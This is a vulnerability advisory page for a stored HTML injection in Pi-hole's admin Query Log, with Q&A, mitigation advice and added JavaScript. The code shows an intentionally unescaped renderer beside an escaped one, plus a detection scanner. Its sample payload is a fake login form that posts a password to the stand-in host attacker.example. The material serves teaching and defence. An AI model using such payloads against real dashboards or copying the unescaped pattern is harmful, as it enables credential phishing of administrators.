CVE-2026-33405
Stored HTML Injection in Pi-hole Admin Interface Query Log
Publication date: 2026-04-06
Last updated on: 2026-04-09
Assigner: GitHub, Inc.
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| pi-hole | web_interface | From 6.0 (inc) to 6.4.1 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-33405 is a stored HTML injection vulnerability in the Pi-hole Admin Interface, specifically in queries.js, affecting versions 6.0 through 6.4.1. The vulnerability occurs because the formatInfo() function renders certain fields (data.upstream, data.client.ip, and data.ede.text) directly into HTML without escaping when a user expands a query row in the Query Log detail view.
While JavaScript execution is blocked by the server's Content Security Policy (CSP), the injected HTML can still cause UI defacement or phishing risks by inserting arbitrary markup such as fake login forms into the page. Exploitation requires authenticated administrator access and either local filesystem access or control of an upstream DNS server.
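The rendering pattern described above, shown as an added example rather than Pi-hole's own queries.js code: an unescaped template renders whatever the API returned for upstream, client.ip and ede.text as markup, while an escaping helper neutralises it. The field names follow the advisory; the record, the escape helper and the renderer names are constructed for this illustration.

```javascript
// Added example (not Pi-hole's code): the CWE-79 pattern the advisory
// describes, beside a hardened version. Field names follow the advisory;
// the sample record and function names are constructed here.

// Minimal HTML escaper for element content and double-quoted attributes.
const escapeHtml = (s) =>
  String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);

// Vulnerable pattern: untrusted API fields are interpolated straight into markup.
function renderInfoUnsafe(data) {
  return `<tr><td>Upstream</td><td>${data.upstream}</td></tr>` +
         `<tr><td>Client</td><td>${data.client.ip}</td></tr>` +
         `<tr><td>EDE</td><td>${data.ede.text}</td></tr>`;
}

// Hardened pattern: every untrusted value is escaped before it reaches the page.
function renderInfoSafe(data) {
  return `<tr><td>Upstream</td><td>${escapeHtml(data.upstream)}</td></tr>` +
         `<tr><td>Client</td><td>${escapeHtml(data.client.ip)}</td></tr>` +
         `<tr><td>EDE</td><td>${escapeHtml(data.ede.text)}</td></tr>`;
}

// Constructed record: an Extended DNS Error text (RFC 8914 code 0, "Other")
// carrying a phishing form, the kind of payload a hostile upstream could return.
const sampleQuery = {
  upstream: "203.0.113.53#53",
  client: { ip: "192.0.2.10" },
  ede: {
    code: 0,
    text: '<form action="https://attacker.example/login"><input name="pw"></form>',
  },
};

console.log("unsafe:", renderInfoUnsafe(sampleQuery));
console.log("safe:  ", renderInfoSafe(sampleQuery));
```

The unsafe output contains a live form element that the browser will render inside the expanded row; CSP does not prevent that, because no script runs. The safe output shows the same text as literal characters. Where the view is built with DOM APIs, assigning to textContent instead of innerHTML achieves the same effect without a string escaper.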
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The provided information does not specify any direct impact of this vulnerability on compliance with common standards and regulations such as GDPR or HIPAA.
How can this vulnerability impact me?
This vulnerability can impact you by allowing an attacker with authenticated administrator access to cause UI defacement or phishing attacks within the Pi-hole Admin Interface. Although JavaScript execution is blocked by the CSP, malicious HTML can still be injected, potentially misleading administrators through fake forms or altered interface elements.
Exploitation requires either control over an upstream DNS server to inject malicious Extended DNS Error (EDE) text or interception of API responses, making the attack vector local and requiring high privileges.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection of this vulnerability involves verifying the Pi-hole web interface version and inspecting the data shown in the Query Log detail view of the Pi-hole Admin Interface.
Specifically, check whether your Pi-hole web interface version is in the affected range, 6.0 through 6.4.1; the fix shipped in 6.5.
Since exploitation requires authenticated administrator access and potentially control over upstream DNS responses, detection can include reviewing query logs for unusual HTML content in the expanded query rows.
No explicit commands are provided in the resources, but general steps include:
- Check Pi-hole version: `pihole -v` (it reports the core, web and FTL versions; the web interface version is the relevant one here)
- Manually inspect the Query Log detail view in the Admin Interface for any unexpected HTML rendering or UI defacement. Note that expanding a row on an unpatched instance is exactly what renders injected markup, so where possible review the raw query data rather than the rendered view.
- Review upstream DNS server responses or logs for suspicious Extended DNS Error (EDE) text that might contain HTML.
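One way to do that raw-data review, as an added example rather than a tool shipped with Pi-hole: scan query-log records for HTML-significant characters in the three fields the advisory says are rendered unescaped. The record shape (upstream, client.ip, ede.text) follows the field names in the advisory; that it matches your Pi-hole's API output exactly is an assumption to verify against the version you run, and the sample records below are constructed.

```javascript
// Added example (not from Pi-hole or the advisory): flag query-log records
// whose advisory-named fields contain markup. Record shape is assumed from the
// field names in the advisory; the sample data is constructed.

// "<" is what matters in element content; quotes matter if a value is ever
// placed inside an attribute, so they are flagged as well.
const HTML_SIGNIFICANT = /[<>"']/;

// Fields the advisory says formatInfo() renders unescaped, as dotted paths.
const WATCHED_FIELDS = ["upstream", "client.ip", "ede.text"];

// Safe nested lookup: returns undefined if any segment is missing or null.
function getPath(obj, path) {
  return path.split(".").reduce((o, k) => (o == null ? undefined : o[k]), obj);
}

// Returns one finding per field value that contains HTML-significant characters.
function findHtmlInQueries(queries) {
  const findings = [];
  queries.forEach((q, index) => {
    for (const field of WATCHED_FIELDS) {
      const value = getPath(q, field);
      if (typeof value === "string" && HTML_SIGNIFICANT.test(value)) {
        findings.push({ index, field, value });
      }
    }
  });
  return findings;
}

// Constructed sample: two benign records and two that carry markup.
const sampleQueries = [
  { upstream: "192.0.2.1#53", client: { ip: "192.0.2.10" }, ede: null },
  { upstream: "192.0.2.1#53", client: { ip: "192.0.2.11" }, ede: { code: 0, text: "Other" } },
  { upstream: "192.0.2.1#53", client: { ip: "192.0.2.12" },
    ede: { code: 0, text: '<form action="https://attacker.example/login">Re-enter password</form>' } },
  { upstream: "<b>cache</b>", client: { ip: "192.0.2.13" }, ede: null },
];

for (const f of findHtmlInQueries(sampleQueries)) {
  console.log(`record ${f.index}: ${f.field} contains markup: ${f.value}`);
}
```

Feed it the JSON you export from the Pi-hole query API instead of the constructed array, and the scan never renders the suspect values; any finding is worth tracing back to the upstream that returned the EDE text or to whatever wrote the unexpected upstream or client value.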
What immediate steps should I take to mitigate this vulnerability?
The primary mitigation step is to upgrade Pi-hole to version 6.5 or later, where this vulnerability has been fixed.
Since exploitation requires authenticated administrator access, ensure that access to the Pi-hole Admin Interface is tightly controlled and limited to trusted users.
Additionally, restrict or monitor control over upstream DNS servers to prevent injection of malicious Extended DNS Error (EDE) text.
The server's Content Security Policy (CSP) already mitigates JavaScript execution risks, but it does not prevent UI defacement or phishing via injected HTML forms, so vigilance is necessary.